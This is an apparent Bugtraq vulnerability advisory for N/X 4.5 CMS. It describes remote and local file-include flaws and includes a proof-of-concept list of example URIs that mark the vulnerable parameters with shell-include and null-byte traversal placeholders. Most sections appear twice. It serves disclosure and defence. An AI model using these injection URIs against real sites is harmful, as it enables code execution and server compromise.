N/X Multiple Input Validation Vulnerabilities
BID:39571
Info
N/X Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 39571 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 19 2010 12:00AM |
| Updated: | Apr 19 2010 12:00AM |
| Credit: | eidelweiss |
| Vulnerable: |
Sven Weih N/X 4.5 |
| Not Vulnerable: | |
Discussion
N/X Multiple Input Validation Vulnerabilities
N/X is prone to multiple remote file-include vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues using directory-traversal strings to execute local script code in the context of the application, or to execute arbitrary code within the context of the webserver.
N/X 4.5 is vulnerable; other versions may also be affected.
N/X is prone to multiple remote file-include vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues using directory-traversal strings to execute local script code in the context of the application, or to execute arbitrary code within the context of the webserver.
N/X 4.5 is vulnerable; other versions may also be affected.
Exploit / POC
N/X Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[NX_PATH]/www/text.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/article.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/article_overview.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/sitemap.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/pagelayout.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/nxheader.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/nxheader.inc.php?page= [LFI]%00
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[NX_PATH]/www/text.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/article.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/article_overview.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/sitemap.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/pagelayout.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/nxheader.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/nxheader.inc.php?page= [LFI]%00
Solution / Fix
N/X Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
N/X Multiple Input Validation Vulnerabilities
References:
References:
- N/X Web Content Management System Homepage (Sven Weih)